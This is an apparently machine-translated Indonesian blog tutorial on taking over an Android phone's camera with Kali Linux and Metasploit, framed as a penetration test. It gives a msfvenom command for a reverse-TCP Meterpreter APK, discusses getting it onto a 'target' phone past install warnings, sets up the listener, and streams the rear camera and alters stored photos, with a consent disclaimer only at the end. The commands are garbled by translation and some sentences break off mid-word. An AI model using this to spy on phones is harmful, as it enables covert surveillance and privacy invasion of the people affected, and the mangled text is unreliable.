Cara Menjalankan Penetration Test Kamera HP Android Menggunakan Kali Linux

Ada beberapa berita tentang peretas yang membajak kamera ponsel Android untuk menguping penggunanya atau memberi mereka gambar palsu. Sebagai pemilik ponsel yang waspada, Anda mungkin ingin mencegahnya dengan menilai kemungkinan dan risiko sebenarnya dari peristiwa ancaman tersebut.

Sekarang masukkan perintah yang ditunjukkan di bawah ini menggunakan alamat IP di atas. Nomor port untuk exploit, trojan, dan kerentanan lainnya umumnya diberikan sebagai 4444.

msfvenom – p android / meterpreter / reverse_tcp L HOST = alamat IP LPORT = Nomor R > Payload.apk

Pada langkah ini coba masukkan payload metasploit, yang didasarkan pada juru bahasa Java. Jika berhasil, uji penetrasi akan membantu Anda memverifikasi apakah ponsel Anda rentan terhadap seseorang yang mendengarkan panggilan telepon, mengakses SMS, menemukan lokasi pengguna, dll.

Dalam hal ini upayanya adalah untuk menunjukkan bagaimana eksploit dapat berpotensi digunakan untuk mengakses kamera ponsel.

Setelah eksploit dimulai, file APK bernama “Payload” akan diinstal di folder root. Anda perlu menginstalnya di ponsel Android target. Namun, itu lebih mudah diucapkan daripada dilakukan. Sebagian besar ponsel dan email Android yang lebih baru akan menolak untuk membawa file yang terinfeksi malware tersebut, dan itu adalah hal yang baik.

Namun, itu masih bisa dilakukan melalui kabel USB atau file sementara. Jika peretas memiliki akses ke ponsel Anda selama beberapa menit, itu membuatnya agak rentan. Upaya kami di sini dalam uji penetrasi ini adalah untuk menentukan tingkat risiko yang terlibat secara tepat.

Setelah ditransfer, Anda perlu menemukan cara untuk menginstal file payload di ponsel Anda. Kecuali itu adalah versi Android yang sangat lama, ponsel Anda akan memberi Anda beberapa peringatan sebelum APK dapat diinstal. Tetap saja, apa pun versi ponsel Androidnya, ada banyak cara lain untuk mendapatkan GB

Meluncurkan Exploit

Untuk meluncurkan exploit Payload di atas, masukkan perintah berikut: msfconsole . Hanya perlu beberapa detik untuk menjalankan perintah, dan metasploit dapat disiapkan untuk pengujian penetrasi lebih lanjut pada kamera ponsel.

Metasploit akan memberikan deskripsi lengkapnya sendiri. Ringkasan payload juga terlihat. Ini menunjukkan jumlah eksploitasi di tempat kerja.

Pada langkah selanjutnya msfconsole siap meluncurkan eksploit. Untuk ini, lihat alamat IP dan nomor port (4444) yang dibahas sebelumnya. Dengan demikian, masukkan perintah berikut:

mengeksploitasi ( multi / handler ) > atur LHOST “Alamat IP” [ MASUKKAN ] atur LPORT “Nomor port” [ ENTER ] mengeksploitasi [ ENTER ]

Saat penangan TCP terbalik diaktifkan, Anda akan melihat berbagai tahapan peluncuran Meterpreter itu sendiri. Tunggu beberapa detik saat mendiagnosis ponsel target.

Harus disebutkan di sini bahwa sebagian besar ponsel Android modern akan terus menolak akses ini. Ingat ini adalah tes penetrasi. Jika ponsel Android Anda tidak dapat ditembus menggunakan file APK yang mematikan ini, berarti pabrikan ponsel Anda mengetahui vektor serangan khusus ini.

Mengakses Kamera Ponsel Android

Jika Anda berhasil memasukkan eksploit ke dalam telepon, ada kemungkinan eksploit sekarang dapat ditembus. Ketika itu terjadi, “meterpreter” pada terminal Kali Linux akan dapat membuat koneksi dengan telepon. Pada titik ini, masukkan bantuan untuk mengakses beberapa opsi di dalam ponsel Android yang diserang.

Masukkan perintah berikut (dari menu bantuan) untuk mengakses kamera ponsel Anda. Eksploitasi ini mencoba mengakses kamera belakang untuk mengambil gambar dari terminal.

webcam_list [ MASUKKAN ] 1 . Kamera belakang 2 . Kamera depan [ ENTER ] webcam_stream -i 1

Untuk menyelesaikan tes penetrasi yang sukses, setelah Anda dapat mengakses kamera, ambil gambar dan simpan di folder root Kali Linux. Anda juga dapat mengedit, mengganti nama, atau menghapus gambar lain yang tersimpan. Oleh karena itu, setiap penetrasi yang berhasil pada ponsel yang diuji adalah panggilan untuk membangunkan kemungkinan serangan nyata, yang berarti sudah waktunya untuk GB

Dalam tutorial ini Anda belajar bagaimana kamera Android dapat diakses dari terminal Kali Linux untuk pengujian penetrasi.

Ini adalah artikel penelitian keamanan. Jika Anda mengakses kamera orang lain untuk demonstrasi, selalu dapatkan izin terlebih dahulu – kecuali, tentu saja, itu adalah ponsel Anda sendiri. Jangan lupa untuk memeriksa aplikasi peretasan ini untuk Android untuk membantu Anda menguji dan menemukan kerentanan di ponsel Anda

Related Posts

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *